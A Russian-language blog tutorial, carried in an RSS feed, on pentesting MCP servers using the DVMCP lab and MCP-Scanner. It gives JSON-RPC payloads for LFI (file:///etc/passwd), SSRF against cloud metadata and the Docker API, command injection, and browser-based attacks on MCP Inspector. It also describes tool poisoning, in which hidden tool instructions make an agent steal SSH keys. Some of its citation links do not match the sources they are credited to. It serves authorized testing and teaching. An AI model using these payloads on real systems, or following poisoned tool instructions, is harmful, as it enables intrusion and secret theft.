<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>-_-</title><generator>teletype.in</generator><description><![CDATA[Сила будет твоим щитом, воля будет твоим мечом.]]></description><image><url>https://img4.teletype.in/files/7b/98/7b980f88-9c92-48f7-8a46-d5eeee63da44.png</url><title>-_-</title><link>https://teletype.in/@ad_poheque</link></image><link>https://teletype.in/@ad_poheque?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/ad_poheque?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/ad_poheque?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Wed, 30 Sep 2026 13:09:40 GMT</pubDate><lastBuildDate>Wed, 30 Sep 2026 13:09:40 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@ad_poheque/pentesting_mcp_servers</guid><link>https://teletype.in/@ad_poheque/pentesting_mcp_servers?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque</link><comments>https://teletype.in/@ad_poheque/pentesting_mcp_servers?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque#comments</comments><dc:creator>ad_poheque</dc:creator><title>Методология MCPwn'а</title><pubDate>Tue, 09 Dec 2025 02:58:57 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/ce/61/ce615864-fbad-4d44-9d0f-3e8f8b2b23ea.png"></media:content><category>Pentest</category><description><![CDATA[<img src="https://img4.teletype.in/files/f2/d6/f2d6cdef-ee55-4d10-99c1-fc84c6cc59c2.png"></img>MCP начали внедрять быстрее, чем строить модель угроз.]]></description><content:encoded><![CDATA[
  <figure id="oJD4" class="m_retina">
    <img src="https://img4.teletype.in/files/f2/d6/f2d6cdef-ee55-4d10-99c1-fc84c6cc59c2.png" width="768" />
  </figure>
  <h2 id="XWKD"><br />Атаки на MCP-серверы: вводный практический разбор (DVMCP + MCP-Scanner)</h2>
  <p id="odIk"></p>
  <p id="lBcm">Данный материал, представленный в данном материале, предназначен <strong>исключительно</strong> для:</p>
  <ul id="7m1I">
    <li id="jaOn">авторизованного тестирования;</li>
    <li id="akIo">использования в учебных целях;</li>
    <li id="nIGZ">работы в тестовых средах;</li>
    <li id="7kB5">применения в инфраструктуре, на которую у пользователя имеется прямое письменное заверенное разрешение.</li>
  </ul>
  <p id="XfaK"><strong>Важно:</strong> <u>применение описанных методик к любым системам, не находящимся в вашем законном распоряжении и не имеющих официального разрешения на проведение тестирования, является <strong>противоправным действием</strong>. Подобные действия могут повлечь за собой <strong>уголовную ответственность</strong> в соответствии с действующим законодательством.</u></p>
  <p id="9Twu">Автор материала <strong>не несёт </strong>ответственности за:</p>
  <ul id="3lhY">
    <li id="0Sjg">несанкционированное использование изложенных методов;</li>
    <li id="EEoN">противоправные действия, совершённые с применением описанной методологии;</li>
    <li id="9sTT">любой ущерб, причинённый в результате нелицензионного применения представленных сведений.</li>
  </ul>
  <h2 id="zkHL">Введение</h2>
  <p id="Oe0A">MCP (Model Context Protocol) — открытый протокол поверх HTTP и JSON-RPC, который позволяет LLM-агентам ходить к внешним сервисам и инструментам: файловым системам, базам данных, внутренним API, облакам. По сути, это «универсальный USB-C» для ИИ-приложений: модель остаётся «мозгом», а MCP-серверы становятся руками, которые выполняют реальные действия.</p>
  <p id="0PvM">Проблема в том, что MCP начали внедрять быстрее, чем строить модель угроз. Исследование Knostic и проекта ModelContextProtocol-Security показало: в интернете обнаружено <strong>1862 MCP-сервера</strong>, доступных через Shodan; все 119 вручную проверенных экземпляров выдавали список инструментов без какой-либо аутентификации.(<a href="https://medium.com/%2540ibm_ptc_security/dom-clobbering-baa55c208bce" target="_blank">PRWeb</a>)</p>
  <p id="SOuH">Дальше — хуже. Отчёты Kulkan Security и других команд показывают типичные ошибки: отсутствие проверки прав, небезопасные параметры URI, инструменты, запускающие команды ОС без фильтрации, и ресурсы, позволяющие читать файлы с диска.(<a href="https://medium.com/%2540ibm_ptc_security/dom-clobbering-baa55c208bce" target="_blank">Medium</a>) По аналогии с классическими REST-API, MCP-серверы оказываются уязвимы к тем же классам атак:</p>
  <ul id="dR5Q">
    <li id="8lzD">SSRF (Server-Side Request Forgery) — проксирование запросов во внутреннюю сеть через <code>resources/read</code> или HTTP-инструменты;</li>
    <li id="F8KO">LFI / path traversal — чтение локальных файлов через <code>file://</code>-URI;</li>
    <li id="bcNz">IDOR — доступ к чужим объектам по изменённым идентификаторам в URI;</li>
    <li id="uAhl">Command injection / RCE — запуск команд через небезопасные инструменты.</li>
  </ul>
  <p id="p2Aj">Параллельно появляются уже вполне серьёзные инциденты:</p>
  <ul id="MzzS">
    <li id="BpUm"><strong>Tool poisoning.</strong> Invariant Labs показали, как «безобидный» инструмент <code>add(a, b)</code> может содержать скрытые инструкции (в тегах вида <code>&lt;IMPORTANT&gt;</code>), заставляющие агента вычитать SSH-ключи и конфиги IDE и отправлять их злоумышленнику.(<a href="https://www.reddit.com/r/cursor/comments/1jqf1u5/mcp_is_awesome_until_it_steals_your_secrets/" target="_blank">Reddit</a>)</li>
    <li id="e3wh"><strong>OAuth / клиентские RCE.</strong> Veria Labs описали цепочку «злой MCP-сервер → некорректная обработка OAuth → запуск браузера через shell → RCE» в таких инструментах, как Claude Code и Gemini CLI.(<a href="https://previouslyontech.com/p/data-centers-in-space" target="_blank">Previously on Tech</a>)</li>
    <li id="xFcB"><strong>Локальные dev-инструменты.</strong> Oligo Security и другие исследователи показали критическую RCE в Anthropic MCP Inspector (CVE-2025-49596): достаточно, чтобы разработчик открыл страницу с вредоносным JavaScript в браузере — и тот сможет отправить запрос к локальному MCP-proxy на <code>0.0.0.0:6277</code> и выполнить команду на машине.(<a href="https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596" target="_blank">oligo.security</a>)</li>
  </ul>
  <p id="OSFN"></p>
  <p id="5Bx0">На этом фоне становится очевидно: <strong>MCP — это не магия, а обычный сетевой интерфейс</strong>, который нужно тестировать так же жёстко, как REST-API или GraphQL.</p>
  <p id="AHET">В этой первой части мы разберём:</p>
  <ul id="rxRN">
    <li id="UmUc">как поднять уязвимый стенд на базе <strong>Damn Vulnerable MCP Server (DVMCP)</strong>;</li>
    <li id="T2x6">как использовать <strong>MCP-Scanner</strong> для массового сбора MCP-эндпоинтов и их описаний;</li>
    <li id="ai9B">как вручную, через JSON-RPC и инструменты вроде Burp, проверять базовые уязвимости: SSRF, LFI, IDOR, command injection.</li>
  </ul>
  <p id="cfLx">Вторая часть (отдельный материал) будет посвящена сложным цепочкам атак, prompt/tool poisoning и методикам защиты.</p>
  <hr />
  <h2 id="1sby">Подготовка стенда: Damn Vulnerable MCP Server (DVMCP)</h2>
  <p id="2Arx">Для практики удобно иметь преднамеренно уязвимый стенд — ровно ту же роль, что OWASP Juice Shop играет для веба. Для MCP эту роль выполняет проект <strong>Damn Vulnerable MCP Server (DVMCP)</strong>. Это набор из 10 MCP-серверов с разными классами уязвимостей (prompt injection, утечка токенов, LFI, RCE, неправильный контроль доступа и т.п.).(<a href="https://socradar.io/blog/mcp-servers-everything-you-need-to-know/" target="_blank">SOCRadar® Cyber Intelligence Inc.</a>)</p>
  <p id="ER0t">Поднять его просто:</p>
  <pre id="vC8r" data-lang="bash">git clone https://github.com/harishsg993010/damn-vulnerable-MCP-server.git
cd damn-vulnerable-MCP-server
docker build -t dvmcp .
docker run -p 9001-9010:9001-9010 dvmcp
</pre>
  <ul id="ERB1">
    <li id="LMtH"><code>docker build</code> собирает образ <code>dvmcp</code>;</li>
    <li id="f80j"><code>docker run</code> поднимает контейнер с MCP-серверами на портах <code>9001–9010</code>.</li>
  </ul>
  <p id="ivWM">После запуска у вас на <code>localhost</code> будут доступны эндпоинты вида:</p>
  <ul id="waqV">
    <li id="tpEO"><code>http://localhost:9001/mcp</code></li>
    <li id="QBWk"><code>http://localhost:9002/mcp</code></li>
    <li id="mICj"><code>http://localhost:9010/mcp</code></li>
  </ul>
  <p id="LSzp">Каждый порт — отдельный «челлендж» с определённым типом бага. Автор проекта рекомендует Linux-среду с нормально настроенным Docker: так проще повторять эксперименты и смотреть логи сервера.</p>
  <p id="fAec">К этим MCP-серверам можно подключаться:</p>
  <ul id="4xnI">
    <li id="w2mC">любым совместимым клиентом (например, MCP Inspector — но помнить про его уязвимости и обновлять до последних версий);(<a href="https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596" target="_blank">oligo.security</a>)</li>
    <li id="PKr3">напрямую через HTTP — отправляя JSON-RPC запросы из <code>curl</code>, Burp Repeater, Postman и т.п.</li>
  </ul>
  <hr />
  <h2 id="oGfm">Обзор MCP-Scanner: массовое обнаружение MCP-серверов</h2>
  <p id="wz5Y">Если DVMCP нужен для локальной тренировки, то в реальной работе полезен инструмент, который поможет:</p>
  <ol id="4Ovg">
    <li id="0NwQ">найти MCP-серверы в интернете;</li>
    <li id="2PS9">убедиться, что они действительно говорят на MCP;</li>
    <li id="H56H">собрать базовую информацию: список tools/resources/prompts и параметры.</li>
  </ol>
  <p id="jhnU">Один из первых публичных инструментов такого рода — <strong>MCP-Scanner</strong> от Knostic.(<a href="https://github.com/knostic/MCP-Scanner" target="_blank">GitHub</a>)</p>
  <p id="ZGul">Это Python-скрипт, который:</p>
  <ul id="PlDE">
    <li id="DTIS">использует API Shodan для поиска потенциальных MCP-эндпоинтов (по портам, заголовкам и контенту);</li>
    <li id="tfms">пробует выполнить базовый JSON-RPC handshake;</li>
    <li id="lv5A">для «живых» серверов вытаскивает список инструментов (<code>tools/list</code>) и ресурсов (<code>resources/list</code>);</li>
    <li id="LnfP">сохраняет результаты в удобных форматах для анализа.</li>
  </ul>
  <p id="xEkr">Пример установки и запуска:</p>
  <pre id="AC4Q" data-lang="bash">git clone https://github.com/knostic/MCP-Scanner.git
cd MCP-Scanner
pip install -r requirements.txt  # либо вручную: pip install shodan requests aiohttp
python mcp_scanner.py --api-key YOUR_SHODAN_API_KEY
</pre>
  <p id="OiB8">По умолчанию сканер:</p>
  <ul id="Umz0">
    <li id="S27R">использует встроенные фильтры Shodan;</li>
    <li id="clp5">собирает ограниченное количество результатов на фильтр (например, по 50);</li>
    <li id="5dO9">по каждому кандидату пытается выполнить MCP-инициализацию и получить списки tools/resources.</li>
  </ul>
  <p id="ZUW6">На выходе создаётся директория вида <code>mcp_scan_results_2025-XX-XX/</code> со следующими файлами:</p>
  <ul id="X0UV">
    <li id="gR4A"><strong><code>verified_servers.json</code></strong> — подробная информация по каждому подтверждённому MCP-серверу: URL, успех handhshake, список инструментов, ресурсы, возможные проблемы;</li>
    <li id="D00p"><strong><code>verified_servers.csv</code></strong> — то же в табличном виде, удобно грузить в Excel/BI;</li>
    <li id="CEmi"><strong><code>scan_summary.txt</code></strong> — краткий текстовый отчёт;</li>
    <li id="gDBO"><strong>лог-файл</strong> работы (<code>mcp_discovery_*.log</code>), полезен для разбора сбоев и ложных срабатываний.</li>
  </ul>
  <p id="09XX">В своём исследовании Knostic на основе этого сканера и вспомогательных скриптов обнаружили те самые 1862 открытых MCP-сервера и показали, что все проверенные экземпляры были неправильно сконфигурированы (нет авторизации, нет ограничения инструментов, утечки ресурсов).(<a href="https://www.prweb.com/releases/knostics-ai-security-research-unveiled-1-862-exposed-mcp-servers-lack-essential-security-measures-302512722.html" target="_blank">PRWeb</a>)</p>
  <p id="Dlpv">Для пентестера <strong>MCP-Scanner</strong> — это аналог <code>httpx</code>/<code>nuclei</code> для новой поверхности атаки: помогает быстро собрать карту уязвимых серверов и понять, куда тратить время на ручной анализ.</p>
  <hr />
  <h2 id="MtXv">Базовые JSON-RPC запросы к MCP</h2>
  <p id="9RiX">MCP использует JSON-RPC 2.0, обёрнутый в HTTP (или другой транспорт — SSE, WebSocket, stdio). В простейшем случае мы имеем:</p>
  <ul id="orrC">
    <li id="Y0hM">HTTP POST на <code>/mcp</code> (или другой endpoint);</li>
    <li id="W1Pe">JSON-тело вида:</li>
  </ul>
  <pre id="D1ea" data-lang="javascript">{
  &quot;jsonrpc&quot;: &quot;2.0&quot;,
  &quot;id&quot;: 1,
  &quot;method&quot;: &quot;tools/list&quot;,
  &quot;params&quot;: { ... }
}
</pre>
  <p id="JxJA">Ниже — несколько типовых запросов, которые нужны для ручного тестирования.</p>
  <h3 id="v6nC">Инициализация сессии (<code>initialize</code>)</h3>
  <pre id="z7M2" data-lang="bash">curl -X POST http://localhost:9001/mcp \
  -H &quot;Content-Type: application/json&quot; \
  --data &#x27;{
    &quot;jsonrpc&quot;: &quot;2.0&quot;,
    &quot;id&quot;: 1,
    &quot;method&quot;: &quot;initialize&quot;,
    &quot;params&quot;: {
      &quot;protocolVersion&quot;: &quot;2025-06-18&quot;,
      &quot;capabilities&quot;: { &quot;tools&quot;: {}, &quot;resources&quot;: {}, &quot;prompts&quot;: {} },
      &quot;clientInfo&quot;: { &quot;name&quot;: &quot;Tester&quot;, &quot;version&quot;: &quot;1.0&quot; }
    }
  }&#x27;
</pre>
  <p id="8F4T">В ответ сервер должен вернуть объект <code>result</code> с информацией о себе (версия, поддерживаемые возможности) и, как правило, заголовок <strong><code>MCP-Session-Id</code></strong>. Этот идентификатор нужно передавать в последующих запросах:</p>
  <pre id="qpf5" data-lang="bash">-H &quot;MCP-Session-Id: &lt;ID_из_ответа&gt;&quot;
</pre>
  <p id="5BPa">Если последующие вызовы работают <strong>без</strong> инициализации или Session-Id, это уже сигнал к проверке авторизации.</p>
  <h3 id="wI2Z">Получение списка инструментов (<code>tools/list</code>)</h3>
  <pre id="KYwe" data-lang="bash">curl -X POST http://localhost:9001/mcp \
  -H &quot;Content-Type: application/json&quot; \
  -H &quot;MCP-Session-Id: &lt;ID&gt;&quot; \
  --data &#x27;{
    &quot;jsonrpc&quot;: &quot;2.0&quot;,
    &quot;id&quot;: 2,
    &quot;method&quot;: &quot;tools/list&quot;,
    &quot;params&quot;: {}
  }&#x27;
</pre>
  <p id="ryL7">Сервер вернёт массив доступных инструментов: имя, описание, схема параметров (типы, обязательность, дефолты). Это основная точка входа для поиска опасных полей (<code>cmd</code>, <code>path</code>, <code>uri</code>, <code>url</code>, <code>expression</code> и т.п.).</p>
  <h3 id="1CKK">Чтение ресурса (<code>resources/read</code>)</h3>
  <pre id="juh9" data-lang="bash">curl -X POST http://localhost:9001/mcp \
  -H &quot;Content-Type: application/json&quot; \
  -H &quot;MCP-Session-Id: &lt;ID&gt;&quot; \
  --data &#x27;{
    &quot;jsonrpc&quot;: &quot;2.0&quot;,
    &quot;id&quot;: 3,
    &quot;method&quot;: &quot;resources/read&quot;,
    &quot;params&quot;: {
      &quot;uri&quot;: &quot;file:///etc/passwd&quot;
    }
  }&#x27;
</pre>
  <p id="Bh0j">Здесь мы просим сервер прочитать локальный файл <code>/etc/passwd</code>. Если в реализации нет фильтрации или ограничения допустимых URI, сервер может вернуть содержимое файла — это классическая LFI/path traversal, о которой уже предупреждают авторы спецификации и практических гайдов по MCP.(<a href="https://socradar.io/blog/mcp-servers-everything-you-need-to-know/" target="_blank">SOCRadar® Cyber Intelligence Inc.</a>)</p>
  <p id="yeLg">Те же запросы удобно отправлять через Burp Repeater:</p>
  <ul id="SDhd">
    <li id="N2qt">в заголовках — <code>Content-Type: application/json</code> и <code>MCP-Session-Id</code>;</li>
    <li id="HkOe">в теле — JSON-RPC, как в примерах выше.</li>
  </ul>
  <hr />
  <h2 id="TcTw">Ручное тестирование MCP-серверов: основные уязвимости</h2>
  <h3 id="hSDL">1. IDOR (Insecure Direct Object Reference)</h3>
  <p id="UdJN">MCP-ресурсы часто адресуются по URI с идентификатором:</p>
  <ul id="ZTfx">
    <li id="UMfH"><code>resource://user/1234/data</code></li>
    <li id="CS7s"><code>resource://project/5678/config</code></li>
    <li id="MvaR"><code>resource://tenant/acme/invoices/2024</code></li>
  </ul>
  <p id="MELm">Если сервер не проверяет, соответствует ли запрашиваемый объект текущему пользователю/контексту, атакующий может заменить ID и получить доступ к чужим данным.</p>
  <p id="tW9P">Методика:</p>
  <ol id="0hOA">
    <li id="JY0X">Находим ресурсы с явными ID (через <code>resources/list</code> или документацию).</li>
    <li id="46J0">Отправляем <code>resources/read</code> с изменённым идентификатором: <code>{ &quot;jsonrpc&quot;: &quot;2.0&quot;, &quot;id&quot;: 10, &quot;method&quot;: &quot;resources/read&quot;, &quot;params&quot;: { &quot;uri&quot;: &quot;resource://user/5678/data&quot; } } </code></li>
    <li id="7iBM">Сравниваем результат:</li>
    <ul id="GWaV">
      <li id="Y35j">если приходит ошибка «access denied» — всё хорошо;</li>
      <li id="6mRs">если данные отличаются, а авторизация не учитывает ID — это IDOR.</li>
    </ul>
  </ol>
  <p id="dXME">Такой же приём работает для инструментов (<code>tools/call</code>), которые принимают ID в параметрах.</p>
  <hr />
  <h3 id="KYNR">2. SSRF (Server-Side Request Forgery)</h3>
  <p id="R5ft">Если ресурсы или инструменты позволяют читать произвольные URL, MCP-сервер превращается в прокси во внутреннюю сеть. Это критично, когда MCP расположен внутри корпоративного контура или за mTLS-шлюзами: запрос идёт из доверенной зоны.</p>
  <p id="QTlP">Примеры:</p>
  <pre id="nQuT" data-lang="javascript">{
  &quot;jsonrpc&quot;: &quot;2.0&quot;,
  &quot;id&quot;: 20,
  &quot;method&quot;: &quot;resources/read&quot;,
  &quot;params&quot;: {
    &quot;uri&quot;: &quot;http://169.254.169.254/latest/meta-data/&quot;
  }
}
</pre>
  <ul id="7huY">
    <li id="HFa9">Классика облачных атак: запрос к AWS Instance Metadata Service (IMDS).(<a href="https://tldrsec.com/p/tldr-sec-293" target="_blank">tl;dr sec</a>)</li>
  </ul>
  <pre id="j6p4" data-lang="bash">{
  &quot;jsonrpc&quot;: &quot;2.0&quot;,
  &quot;id&quot;: 21,
  &quot;method&quot;: &quot;resources/read&quot;,
  &quot;params&quot;: {
    &quot;uri&quot;: &quot;http://127.0.0.1:2375/containers/json&quot;
  }
}
</pre>
  <ul id="lJ6D">
    <li id="FiKC">Попытка достучаться до локального Docker-daemon API (<code>2375/tcp</code>), если он открыт без TLS/аутентификации.</li>
  </ul>
  <p id="EFBA">Если MCP-сервер находится за mTLS-шлюзом и использует клиентский сертификат для доступа к внутренним API, а вы можете управлять URI — вы, по сути, «садитесь» на уровень доверия этого сервиса. mTLS не ломается криптографически, но становится бессильным против <strong>легитимного запроса изнутри</strong>, сгенерированного через SSRF.</p>
  <p id="TkRT">Признаки:</p>
  <ul id="jlii">
    <li id="g6oH">в ответе видно содержимое внутренних API/метаданных;</li>
    <li id="2LeM">сервер отвечает отличающимися по структуре ошибками (утечка фрагментов HTML/JSON с внутренних сервисов).</li>
  </ul>
  <hr />
  <h3 id="kMJS">3. LFI / Path Traversal</h3>
  <p id="a1hC">LFI для MCP — это частный случай опасной работы с <code>file://</code>-URI или путями.</p>
  <p id="uXVw">Типовой payload:</p>
  <pre id="wP1T" data-lang="javascript">{
  &quot;jsonrpc&quot;: &quot;2.0&quot;,
  &quot;id&quot;: 30,
  &quot;method&quot;: &quot;resources/read&quot;,
  &quot;params&quot;: {
    &quot;uri&quot;: &quot;file:///etc/passwd&quot;
  }
}
</pre>
  <p id="eukR">или:</p>
  <pre id="AFCt" data-lang="javascript">{
  &quot;jsonrpc&quot;: &quot;2.0&quot;,
  &quot;id&quot;: 31,
  &quot;method&quot;: &quot;resources/read&quot;,
  &quot;params&quot;: {
    &quot;uri&quot;: &quot;file://C:/Windows/win.ini&quot;
  }
}
</pre>
  <p id="8hPR">Проверяем:</p>
  <ul id="VpoX">
    <li id="bkRv">чтение «невинных» файлов (<code>/etc/hostname</code>, <code>win.ini</code>);</li>
    <li id="LVvu">попытки traversal: <code>file:///../../../../etc/passwd</code>, специальные символы (<code>..%2f..%2f</code>).</li>
  </ul>
  <p id="5Stw">Если сервер возвращает содержимое системных файлов, конфигов БД, kubeconfig, SSH-ключей и т.п. — это LFI с высоким риском.</p>
  <hr />
  <h3 id="30E6">4. Command Injection / RCE</h3>
  <p id="O0Ct">По исследованиям Palo Alto, SOC Radar и других команд, значительная часть ошибок в MCP связана с небезопасными инструментами: они вызывают оболочку, интерпретатор или системные утилиты напрямую, подставляя аргументы из параметров запроса.(<a href="https://research.aimultiple.com/mcp-security/?utm_source=chatgpt.com" target="_blank">AIMultiple</a>)</p>
  <p id="XPP1">Что искать:</p>
  <ul id="Xr2y">
    <li id="ECY6">инструменты с именами или описанием: <code>execute_command</code>, <code>run_shell</code>, <code>evaluate_expression</code>, <code>system</code>, <code>bash</code>, <code>powershell</code> и т.п.;</li>
    <li id="mOpC">параметры <code>cmd</code>, <code>command</code>, <code>expression</code>, <code>script</code>, <code>path</code>.</li>
  </ul>
  <p id="qFPP">Пример вызова (псевдо):</p>
  <pre id="9wTI" data-lang="javascript">{
  &quot;jsonrpc&quot;: &quot;2.0&quot;,
  &quot;id&quot;: 40,
  &quot;method&quot;: &quot;tools/call&quot;,
  &quot;params&quot;: {
    &quot;name&quot;: &quot;evaluate_expression&quot;,
    &quot;arguments&quot;: {
      &quot;expression&quot;: &quot;; ls /&quot;
    }
  }
}
</pre>
  <p id="7TeK">или более мягкий вариант (где ожидается арифметическая строка):</p>
  <pre id="m4YH" data-lang="javascript">{
  &quot;jsonrpc&quot;: &quot;2.0&quot;,
  &quot;id&quot;: 41,
  &quot;method&quot;: &quot;tools/call&quot;,
  &quot;params&quot;: {
    &quot;name&quot;: &quot;evaluate_expression&quot;,
    &quot;arguments&quot;: {
      &quot;expression&quot;: &quot;__import__(&#x27;os&#x27;).system(&#x27;id&#x27;)&quot;
    }
  }
}
</pre>
  <p id="gRGu">Смотрим:</p>
  <ul id="OXIE">
    <li id="f4GW">появляется ли в ответе вывод команды;</li>
    <li id="IlGt">меняется ли состояние сервера (создан файл, в логах новые строки и т.п.).</li>
  </ul>
  <p id="CkIj">На DVMCP есть челленджи с ровно такой логикой: вместо безопасной обработки выражений используется прямой вызов <code>eval()</code> или командной оболочки — это даёт возможность привести пример RCE «в учебных условиях», не трогая боевые системы.</p>
  <hr />
  <h3 id="qH4U">5. CORS, браузер и «тихий» доступ к MCP</h3>
  <p id="5ga6">Отдельный класс проблем — когда MCP-эндпоинт доступен из браузера:</p>
  <ul id="XFvc">
    <li id="XbnW">заголовки <code>Access-Control-Allow-Origin: *</code> или доверие ко всем доменам;</li>
    <li id="36IJ">отсутствие CSRF-защиты;</li>
    <li id="YyYY">экспонирование MCP Inspector / прокси на <code>0.0.0.0</code> без токена.</li>
  </ul>
  <p id="99sM">Исследования Oligo Security и Qubit показали, что комбинация некорректных CORS/Origin-проверок, DNS rebinding и отсутствия аутентификации в MCP-прокси позволяет:</p>
  <ol id="mIE4">
    <li id="zvDw">заманить разработчика на страницу с вредоносным JavaScript;</li>
    <li id="ejg5">из браузера отправить запрос на <code>http://0.0.0.0:6277/sse?...&amp;command=&lt;payload&gt;</code>;</li>
    <li id="H37C">выполнить произвольную команду на машине жертвы, хотя сервис «вроде бы» слушает только localhost.(<a href="https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596" target="_blank">oligo.security</a>)</li>
  </ol>
  <p id="ACzI">При тестировании:</p>
  <ul id="CpeU">
    <li id="IJQK">смотрим CORS-заголовки в ответах MCP;</li>
    <li id="ITzI">проверяем, не доступны ли dev-инструменты (inspector/proxy) снаружи;</li>
    <li id="EiJ1">отрабатываем сценарий «страница из интернета → запрос на localhost».</li>
  </ul>
  <hr />
  <h2 id="3JAv">Пример короткого отчёта по LFI на DVMCP</h2>
  <p id="4lyI"><strong>Цель:</strong> проверить, может ли MCP-сервер читать произвольные файлы.</p>
  <p id="9Yuk"><strong>Шаги:</strong></p>
  <p id="02GN">Инициализируем сессию: </p>
  <pre id="THdZ" data-lang="bash">curl -X POST \
  http://localhost:9001/mcp \
  -H &quot;Content-Type: application/json&quot; \
  --data &#x27;{
    &quot;jsonrpc&quot;: &quot;2.0&quot;,
    &quot;id&quot;: 1,
    &quot;method&quot;: &quot;initialize&quot;,
    &quot;params&quot;: {
      &quot;protocolVersion&quot;: &quot;2025-06-18&quot;,
      &quot;capabilities&quot;: {},
      &quot;clientInfo&quot;: {
        &quot;name&quot;: &quot;Tester&quot;,
        &quot;version&quot;: &quot;1.0&quot;
      }
    }
  }&#x27;
 </pre>
  <p id="EoH6">В ответе получаем <code>MCP-Session-Id</code>.</p>
  <p id="FvSe">Отправляем запрос на чтение <code>/etc/passwd</code>: </p>
  <pre id="ukL5" data-lang="bash">curl -X POST \
  http://localhost:9001/mcp \
  -H &quot;Content-Type: application/json&quot; \
  -H &quot;MCP-Session-Id: &lt;ID&gt;&quot; \
  --data &#x27;{
    &quot;jsonrpc&quot;: &quot;2.0&quot;,
    &quot;id&quot;: 10,
    &quot;method&quot;: &quot;resources/read&quot;,
    &quot;params&quot;: {
      &quot;uri&quot;: &quot;file:///etc/passwd&quot;
    }
  }&#x27;</pre>
  <p id="MMpJ">В поле <code>result</code> ответа видим содержимое <code>/etc/passwd</code>: список пользователей, их UID, домашние директории.</p>
  <p id="wh4w"><strong>Вывод:</strong> сервер не ограничивает допустимые <code>file://</code>-URI и позволяет читать произвольные файлы. Уязвимость: <strong>LFI/path traversal</strong>. Риск: утечка конфигурации, пользователей, потенциально — секретов (ключей, паролей).</p>
  <hr />
  <h2 id="jVYd">Чек-лист пентестера MCP (часть 1: базовый срез)</h2>
  <p id="Ysm6"><strong>1. Поиск MCP-эндпоинтов</strong></p>
  <ul id="C3CP">
    <li id="OEp2">Сканирование внешки: <code>nmap</code>, <code>httpx</code>, <code>Shodan/Censys/Zoomeye</code>.</li>
    <li id="ZdkS">Признаки MCP:</li>
    <ul id="Qhqs">
      <li id="redW">ответы с <code>{&quot;jsonrpc&quot;: &quot;2.0&quot;, ...}</code>;</li>
      <li id="0XQt">заголовок <code>MCP-Session-Id</code> в ответах;</li>
      <li id="HkYV">пути <code>/mcp</code>, <code>/sse</code>, <code>/mcp-server</code>, <code>/api/mcp/*</code>.</li>
    </ul>
  </ul>
  <p id="SSv3"><strong>2. Инициализация и авторизация</strong></p>
  <ul id="3MRb">
    <li id="CCim">Отправить <code>initialize</code> и сохранить <code>MCP-Session-Id</code>.</li>
    <li id="lOrQ">Проверить поведение:</li>
    <ul id="4tGI">
      <li id="cYeJ">работают ли запросы без <code>initialize</code>?</li>
      <li id="TLaQ">работают ли запросы без <code>MCP-Session-Id</code> или с поддельным значением?</li>
    </ul>
    <li id="egVE">Любой доступ к чувствительным операциям без корректной сессии — баг авторизации.</li>
  </ul>
  <p id="MRMt"><strong>3. Перечисление функционала</strong></p>
  <ul id="hSa5">
    <li id="CMQi">Вызвать <code>tools/list</code>, <code>resources/list</code>, <code>prompts/list</code>.</li>
    <li id="joQk">Зафиксировать:</li>
    <ul id="dreq">
      <li id="oeWY">инструменты с опасными параметрами (cmd, url, path, expression);</li>
      <li id="8Dus">ресурсы с URI вида <code>file://</code>, <code>http://</code>, <code>s3://</code>, <code>resource://user/{id}</code>.</li>
    </ul>
  </ul>
  <p id="JDwL"><strong>4. SSRF / LFI</strong></p>
  <ul id="pVje">
    <li id="NuO8">Для всех полей, похожих на URI/URL:</li>
    <ul id="KePD">
      <li id="FUJa">пробуем <code>http://169.254.169.254/...</code>, <code>http://127.0.0.1:...</code> (аккуратно, без DoS);</li>
      <li id="yiOV">пробуем <code>file:///etc/passwd</code>, <code>file://C:/Windows/win.ini</code>, traversal-варианты.</li>
    </ul>
    <li id="iZdM">Фиксируем случаи, когда содержимое реально читается или меняется тип ошибки.</li>
  </ul>
  <p id="HAHt"><strong>5. Command Injection / RCE</strong></p>
  <ul id="bBiS">
    <li id="PgXF">Ищем инструменты, вызывающие внешние команды.</li>
    <li id="WOHx">Пробуем минимальные payload’ы:</li>
    <ul id="DUns">
      <li id="Yski"><code>; id</code>, <code>&amp;&amp; whoami</code>, <code>| uname -a</code>;</li>
      <li id="MRLj">в «вычислителях» — злоупотребление <code>eval()</code> или интерпретатором (<code>__import__(&#x27;os&#x27;)...</code>).</li>
    </ul>
    <li id="5bl6">Смотрим на вывод и побочные эффекты.</li>
  </ul>
  <p id="kUpf"><strong>6. IDOR и доступ к чужим данным</strong></p>
  <ul id="NBbP">
    <li id="snds">Меняем ID в URI/параметрах на заведомо «чужие».</li>
    <li id="SyvY">Проверяем, возвращается ли другой объект без ошибок доступа.</li>
  </ul>
  <p id="iF6O"><strong>7. CORS / браузер</strong></p>
  <ul id="CTa7">
    <li id="eyXi">Анализируем заголовки:</li>
    <ul id="gfJm">
      <li id="HCEm"><code>Access-Control-Allow-Origin</code>, <code>Access-Control-Allow-Credentials</code>;</li>
    </ul>
    <li id="CVwN">Ищем dev-панели/инспекторы, работающие через браузер.</li>
    <li id="XmSK">Оцениваем риск XSS/CSRF-цепочек по аналогии с кейсом MCP Inspector.</li>
  </ul>
  <p id="FPOd"><strong>8. Отчётность</strong></p>
  <ul id="wrJQ">
    <li id="if3I">Для каждой находки:</li>
    <ul id="4fB7">
      <li id="B7Re">сохраняем сырой запрос (curl / HTTP-дамп);</li>
      <li id="IMAK">сохраняем ответ (обрезая чувствительные данные, если это боевой стенд);</li>
      <li id="oZ82">формулируем риск и потенциальный импакт (что можно сделать в реальной среде).</li>
    </ul>
  </ul>
  <hr />
